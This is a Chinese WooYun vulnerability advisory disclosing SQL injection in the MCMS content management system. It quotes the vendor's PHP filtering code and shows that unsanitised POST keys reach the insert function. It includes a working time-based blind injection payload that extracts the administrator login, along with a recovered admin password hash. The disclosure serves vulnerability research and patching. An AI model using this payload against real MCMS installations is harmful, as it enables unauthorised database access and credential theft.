当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107729

漏洞标题:mcms最新版SQL注入6枚打包(可出任意数据)

相关厂商:mcms.cc

漏洞作者: 路人甲

提交时间:2015-04-15 16:25

修复时间:2015-07-14 16:28

公开时间:2015-07-14 16:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-15: 细节已通知厂商并且等待厂商处理中
2015-04-15: 厂商已经确认,细节仅向厂商公开
2015-04-18: 细节向第三方安全合作伙伴开放
2015-06-09: 细节向核心白帽子及相关领域专家公开
2015-06-19: 细节向普通白帽子公开
2015-06-29: 细节向实习白帽子公开
2015-07-14: 细节向公众公开

简要描述:

mcms最新版SQL注入6枚打包(可出任意数据)

详细说明:

掌易科技的程序员反应相当快啊,确认漏洞当天就修复以后出新版本了,前面在wooyun提的几个漏洞新版的mcms做了相应的处理,发布了新版v_3.1.3.enterprise,再来研究研究。
注入一枚:/app/public/flink.php?m=save&ajax=1 post中有6个参数,虽然都经过了xss和sql的过滤,但是过滤的并不完全,我们看看是如何注入的。这里以forder为例进行说明(虽然下面的代码中,forder被intval了,但是不影响注入啊,慢慢看下去吧)。

function m__save() {
	global $dbm;
    $_POST = H::sqlxss($_POST);
    $_GET = H::sqlxss($_GET);
	$_POST['fscope'] = $_POST['fscope'] == '首页' ? 0 : ($_POST['fscope'] == '全站'?-1:$_POST['fscope']);
	$_POST['fscope'] = intval($_POST['fscope']);
	$_POST['forder'] = intval($_POST['forder']);
	if($_POST['ftitle'] == '') die('{"code":"1","msg":"请填写链接名称","id":"ftitle"}');
	if (verify::verify_url($_POST['furl'])) die('{"code":"1","msg":"链接地址不规范,如以http://开头,.com结尾","id":"furl"}');
	unset($_POST['fgroup_2']);
	unset($_POST['fscope_2']);
	$rs = $dbm->single_insert(TB_PRE."flink",$_POST);
	if($rs['error'] == '') die('{"code":"0","msg":"添加成功"}');
	die('{"code":"1","msg":"添加失败"}');
}


POST和GET的内容经过了过滤,去看看sqlxss()是怎么实现的

public static function sqlxss($input){
    if(is_array($input)){
        foreach($input as $k=>$v){
            $input[$k]=H::sqlxss($v);
        }
    }else{
        $input=H::escape($input,1);
        $input=htmlspecialchars($input,ENT_QUOTES);
    }
    return $input;
}


对用户输入的内容先用H::escape过滤,再用htmlspecialchars过滤,我们再去看看H::escape

public static function escape($input, $urldecode = 0) {
    if(is_array($input)){
        foreach($input as $k=>$v){
            $input[$k]=H::escape($v,$urldecode);
        }
    }else{
        $input=trim($input);
        if ($urldecode == 1) {
            $input=str_replace(array('+'),array('{addplus}'),$input);
            $input = urldecode($input);
            $input=str_replace(array('{addplus}'),array('+'),$input);
        }
        // PHP版本大于5.4.0,直接转义字符
        if (strnatcasecmp(PHP_VERSION, '5.4.0') >= 0) {
            $input = addslashes($input);
        } else {
            // 魔法转义没开启,自动加反斜杠
            if (!get_magic_quotes_gpc()) {
                $input = addslashes($input);
            }
        }
    }
    //防止最后一个反斜杠引起SQL错误如 'abc\'
    if(substr($input,-1,1)=='\\') $input=$input."'";//$input=substr($input,0,strlen($input)-1);
    return $input;
}


对用户的输入过滤的还是很彻底的,但是这里忽略了一点,那就是没有对KEY进行过滤,造成了注入。
在上面第一段代码中,有这么一句$rs = $dbm->single_insert(TB_PRE."flink",$_POST);
直接把POST的内容作为数组代入了insert函数,因此,POST中上key就作为数据库的key代入执行了SQL。
Payload:POST提交

forder`)value(''/**/or/**/(select/**/if(ord(mid((select/**/login_name/**/from/**/mcms_user/**/limit/**/0,1),1,1))%3d108,sleep(1),0))/**/or'')#=forder=100&fgroup=%25E5%258F%258B%25E6%2583%2585%25E9%2593%25BE%25E6%258E%25A5&fgroup_2=%25E5%258F%258B%25E6%2583%2585%25E9%2593%25BE%25E6%258E%25A5&ftitle=test&furl=http%253A%252F%252Ftest.com&fimg=&fscope=%25E9%25A6%2596%25E9%25A1%25B5&fscope_2=%25E9%25A6%2596%25E9%25A1%25B5


因为是time-based blind 注入,猜测管理员用户名的第一个字母时,若错误,延迟2s左右,如下图

错误副本.jpg


若正确,延迟3s左右,如下图

成功副本.jpg


按上面的方法依次做下去(burp intruder或者自己写个脚本跑),可测试管理员用户名为:mcmsadmin,密码为: f6fdffe48c908deb0f4c3bd36c032e72

漏洞证明:

见 详细说明

修复方案:

sqlxss()

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-04-15 16:27

厂商回复:

谢谢

最新状态:

暂无